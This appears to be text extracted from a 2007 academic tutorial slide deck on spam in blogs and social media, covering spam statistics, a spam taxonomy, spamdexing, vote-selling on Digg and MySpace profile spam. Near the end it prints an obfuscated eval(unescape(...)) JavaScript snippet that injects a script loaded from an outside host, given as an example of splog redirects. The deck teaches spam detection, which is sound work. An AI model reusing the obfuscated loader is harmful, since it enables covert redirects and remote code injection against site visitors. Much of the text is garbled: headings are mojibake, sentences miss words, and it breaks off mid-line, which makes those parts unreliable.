™Š–ȱ’—ȱ•˜œȱŠ—ȱ ˜Œ’Š•ȱŽ’Š

Pranam Kolari, Tim Finin Akshay Java, Anupam Joshi

March 25, 2007 ž˜›’Š•ȱž•’—Ž • Spam on the Internet –Variants – Social Media Spam • Reason behind Spam in • Detecting Spam Blogs • Trends and Issues • How can you help? • Conclusions ›ŽœŽ—Ž›œ

Pranam Kolari is a UMBC PhD Tim Finin is a UMBC Professor student. His dissertation is on with over 30 years of experience spam detection, with tools in the applying AI to information developed in use both by academia and systems, intelligent interfaces and industry. He has active research interest robotics. Current interests include social in internal corporate blogs, the Semantic media, the Semantic Web and multi- Web and blog analytics. agent systems.

Akshay Java is a UMBC PhD student. Anupam Joshi is a UMBC Pro- His dissertation is on identify- fessor with research interests in ing influence and opinions in the broad area of networked social media. His research interests computing and intelligent systems. He include blog analytics, information currently serves on the editorial board of retrieval, natural language processing the International Journal of the Semantic and the Semantic Web. Web and Information. Ƿ Ȭ–Š’•ȱ™Š– • Early form seen around 1992 with • 80-85% of all e-mail traffic is spam • In numbers

2005 - (June) 30 billion per day 2006 - (June) 55 billion per day 2006 - (December) 85 billion per day 2007 - (February) 90 billion per day

Sources: IronPort, http://www.ironport.com/company/ironport_pr_2006-06-28.html

‘Šȱ’œȱ™Š–ǵ • “Unsolicited usually commercial e-mail sent to a large number of addresses” – Merriam Webster Online • “ is the abuse of electronic messaging systems to send unsolicited bulk messages, which are almost universally undesired.” – Wikipedia • As the Internet has supported new applications, many other forms are common, requiring a much broader definition

Capturing user attention unjustifiably on the Internet (E-mail, Web, Social Media etc..) Š¡˜—˜–¢ȱ˜ȱ™Š–

Internet Spam

(Forms) Direct Indirect

Tag Spam E-Mail Spam Comment Spam IM Spam (SPIM) Spam Blogs (Splogs) Community Spam General Web Spam

(Mechanisms) œ™Š–Ž¡’— ™Š–Ž¡’—

“We use the term spamming (also, ) to refer to any deliberate human action that is meant to trigger an unjustifiably favorable relevance or importance for a page, considering the page’s true value” –Gyongyiet al

• Compromises Relevance and Importance Scores used by Search Engines • Mostly effects the long tail of keywords (more susceptible) • is a form of spamdexing • 20% of the indexed Web (2005)

Š¡˜—˜–¢ȱ˜ȱ™Š–

Internet Spam

(Forms) Direct Indirect

Tag Spam E-Mail Spam Comment Spam IM Spam (SPIM) Spam Blogs (Splogs) Community Spam General Web Spam

(Mechanisms) ˜Œ’Š•ȱŽ’Šȱ™Š–  ȱ™Š– • Sybil attack – “in computer security is an attack wherein a reputation system is subverted by forging identities in peer-to-peer networks” – Wikipedia • Users that sell – http://usersubmitter.com $20, plus $1 per digg – Spike the vote, site sold on eBay, bought by digg user, finally shut down by digg – Geekforlife, a top 100 digg user, sold his account for $822 on eBay • In addition to direct spam, DIGG popular page also results in high ranking on search engines (Spamdexing) “Why Are People Fascinated By Photographs of Crowds?” • Author Submits Story • 4 hours later only one DIGG on the story • Seeks out User/Submitter • 12 hours later a DIGG Popular Story Šȱ™Š– • Social Bookmark Tools – del.icio.us spam in long tail – Furl popular page spam • Also used for spamdexing

¢•˜˜ȱ™Š– • Fake Profile Image • Fake users • Fake site visits • Fake co-authors • Add friends •Comment Spam Widget Spam

Admiration Spam!? ¢™ŠŒŽȱ™Š– • MySpace is the (5th) 4th highest visited site • Direct User Targeting – Free Products –CAMS The Hoodia Scam • Create an “interesting” profile • Aggressively add friends (+Sybil Attacks) • Wall Hoodia Comments ›”žȱ™Š– • Community Oriented Spam extends across almost all tools ‘Ž›ȱ˜›–œȱ˜ȱœ™Š– It does not take long for spammers to exploit a new form of social media – (pedia) Spam the wikipedia community deletes spam articles and pages – Spam yes, some still have and they attract spam entries – IRC spam bots on IRC channels send you unwanted messages – Second life spam notecards pop up with unwanted messages – Twitter spam it appeared about a week after Twitter went big time – Semantic web spam this one has not yet been seen ™Š–Ž¡’—ȱŠ—ȱ’œȱ ›Ž•Š’˜—ȱ˜ȱ•˜œ

—Š˜–¢ȱ˜ȱ™Š–Ž¡’— • Identify Profitable Contexts • Create multiple doorway pages (or blogs) • Spamdex doorways – Target Relevance Scores • TFIDF • Meta-tag – Target Importance Scores • PageRank • (Or) Game Sponsored Search – Arbitrage • Monetize – Affiliate Programs – Contextual Advertisements Ž—’¢ȱ›˜’Š‹•Žȱ ˜—Ž¡œ for “Student Loan Consolidation” 10K in-links!

Browser Javascript Redirect for Users ›¢™’Œȱ ŠŸŠŒ›’™ȱŽ’›ŽŒœ

eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28 %22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%2 2%2b%22%70%3a%2f%2f%62%69%67%22%2b%22%68%71%2e%69%6e%6 6%6f%2f%73%74%61%74%73%32%2e%70%68%70%3f%69%22%2b%22%6 4%3d%31%32%26%67%72%6f%75%70%3d%32%27%3e%3c%2f%73%63%7 2%69%70%74%22%2b%22%3e%22%29%3b"))

document.write (“